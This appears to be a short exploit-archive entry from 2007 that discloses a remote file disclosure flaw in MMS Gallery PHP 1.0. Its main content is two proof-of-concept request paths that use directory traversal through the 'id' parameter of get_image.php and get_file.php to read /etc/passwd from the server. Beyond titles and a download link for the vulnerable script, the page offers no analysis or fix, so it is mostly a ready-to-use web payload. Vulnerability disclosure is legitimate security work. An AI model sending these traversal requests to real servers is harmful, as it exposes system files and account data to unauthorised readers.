MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability
# Published : 2007-12-13
# Author : GoLd_M
# Previous Title : CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability
# Next Title : xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability

MMS Gallery in PHP v1.0 (id) Remote File Disclosure Vulnerability
D.Script : http://www.mms2web.com/mms_gallery_php.zip
POC :
      /mms_template/get_image.php?id=../../../../../../../../etc/passwd
      /mms_template/get_file.php?id=../../../../../../../../etc/passwd

# www.Syue.com [2007-12-13]